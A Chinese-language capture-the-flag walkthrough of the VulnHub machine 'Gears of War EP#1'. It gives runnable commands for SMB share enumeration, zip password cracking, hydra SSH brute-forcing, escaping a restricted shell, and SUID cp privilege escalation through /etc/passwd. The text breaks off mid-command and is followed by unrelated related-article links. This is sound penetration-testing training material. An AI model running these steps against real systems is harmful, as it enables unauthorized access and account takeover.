目录

  • 介绍
  • 信息收集
    • 主机发现
    • 主机信息探测
    • 访问网站
  • 测试 samba 安全
    • smbmap 访问默认共享
    • enum4linux 获取系统用户
    • smbclient获取文件
    • 查看文件
  • SSH爆破
  • 登录SSH
    • 绕过rbash
    • 提权
    • 查看flag
  • 参考

介绍

系列:Gears of War(此系列仅此一台)
发布日期: 2019年10月17日
难度: 初级
Flag : 不详
学习:SMB攻击
靶机地址:https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具,参见之前的文章:HACKNOS: OS-BYTESEC

信息收集

主机发现

netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。

主机信息探测

信息探测:nmap -A -p- 192.168.124.10,开放了22、80、139、445端口,445的信息过多,靶机的重点是在445上。

访问网站

会注意到网站上面有一个按钮,点击之后依然是一个静态页面,没啥玩的。

测试 samba 安全

smbmap 访问默认共享

smbmap -H 192.168.124.10,发现LOCUS_LAN$有读取权限

递归读取LOCUS_LAN$文件夹:smbmap -H 192.168.124.10 -R LOCUS_LAN$

enum4linux 获取系统用户

使用命令:enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户:marcus、root、nobody

smbclient获取文件

使用空密码连接靶机的共享文件夹,使用get命令下载文件

查看文件

压缩包需要密码才能打开,txt给了一些提示,猜测是@%%,的某一种排列组合才能打开数据包

  1. 生成字典:crunch 4 4 -t @%%, > list.txt
  2. 爆破压缩包
    1. 安装工具:sudo apt-get install fcrackzip
    2. 爆破:fcrackzip -D -u -p list.txt msg_horda.zip

翻译一下,给了我们一些字符:3_d4y。大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。

SSH爆破

hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10

登录SSH

使用命令:ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹,但是访问它的时候被拒了,提示rbash是受限制的。

绕过rbash

指定终端:ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后,发现啥也没有

提权

家目录下没啥文件,直接提权吧。

  1. 查找SUID文件:find / -type f -perm -u=s 2>/dev/null

发现了cp,剩下的简单了,替换passwd文件实现提权即可

  1. 提取出靶机的passwd文件:cat /etc/passwd > passwd
  2. kali通过OpenSSL passwd生成一个新的用户hacker,密码为hack123:
┌──(root												

Vulnhub靶机:GEARS OF WAR_ EP#1相关推荐

  1. Vulnhub靶机:HACKER KID_ 1.0.1

    目录 介绍 信息收集 主机发现 主机信息探测 53 端口 网站探测 页面源代码 DIG信息收集 经典XXE漏洞 探测9999端口 SSTI模板注入 Capabilities 提权 发现具有Capabi ...

  2. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  3. Vulnhub靶机系列:SecTalks: BNE0x03 - Simple

    这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录 靶机地址及相关描述 靶机地址 靶机描述 Simple CTF Location Hints 靶机设置 利 ...

  4. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. Vulnhub靶机DC系列-DC-8

    Vulnhub靶机DC系列-DC-8 靶场名称:DC-8 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ 下载地址: DC-8.zip (Size: 379 ...

  7. Vulnhub靶机:EVILBOX_ ONE(很详细)

    目录 介绍 信息收集 主机发现 主机信息探测 网站探测 目录扫描 目录扫描字典 爆破页面参数 Burpsuite爆破参数 ffuf 补充:区分文件包含与文件读取 文件包含漏洞 文件包含.任意文件读取的 ...

  8. Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub靶机 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试.提权. ...

  9. Vulnhub靶机Wakanda渗透测试攻略

    前言 Wakanda是一个新的交易市场网站,很快会上线了.你的目标是通过黑客技术找到"振金"的确切位置. 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnh ...

最新文章

  1. MMD_2b_NearestNeighborLearning
  2. 帧布局(FrameLayout)及属性
  3. Oracle索引知识学习笔记
  4. 如何用html5编写彩色同心圆,HTML5 canvas 同心圆动画
  5. pygame模块_pygame模块方法和事件
  6. 预算分配Budget Allocation:两篇论文(二)
  7. DFS 下沙小面的(2)
  8. LINUX下载编译libav
  9. 第9月第6天 push pop动画 生成器模式(BUILDER)
  10. java parser .java_JDK的Parser来解析Java源代码详解
  11. 湖南工大计算机学院大一分班,大一新生入学计算机分级教学考试会影响分班吗?...
  12. 35道常见的前端vue面试题
  13. java号码归属地接口,免费API-手机号码归属地接口
  14. win10 脚本查看cpu温度
  15. C Primer Plus(6) 中文版 第5章 运算符、表达式和语句 5.2 基本运算符
  16. 【树莓派】树莓派3B+搭建Ubuntu
  17. 阿里巴巴的P8Java架构师都是一群什么样的存在?
  18. 为Halide安装opencl支持
  19. wpa supplicant
  20. Nginx如何均衡负载

热门文章

  1. 品牌营销策略 | 科学经营合作伙伴关系的5个要素
  2. html中表头斜线文字,div+css编写html的table表头斜线
  3. 服务网格:棋到中盘方见势
  4. 如果有个女孩为你哭,请你放弃她吧(…
  5. 企业工程项目管理系统源码-全面的工程项目管理
  6. 华鑫云SSD硬盘打不开量产,SM2258XT主控29F48B2ALCMG2芯片开卡教程,SM2259XT2可以参考
  7. 云之彼端,牵手未来—— “我思故我在”—我眼中的第四届中国云计算大会
  8. java drawimage 本地,java drawimage()方法
  9. 亚马逊云科技Amazon S3存储与客户的“独家记忆”
  10. 每一个优秀的人,都有一段沉默的时光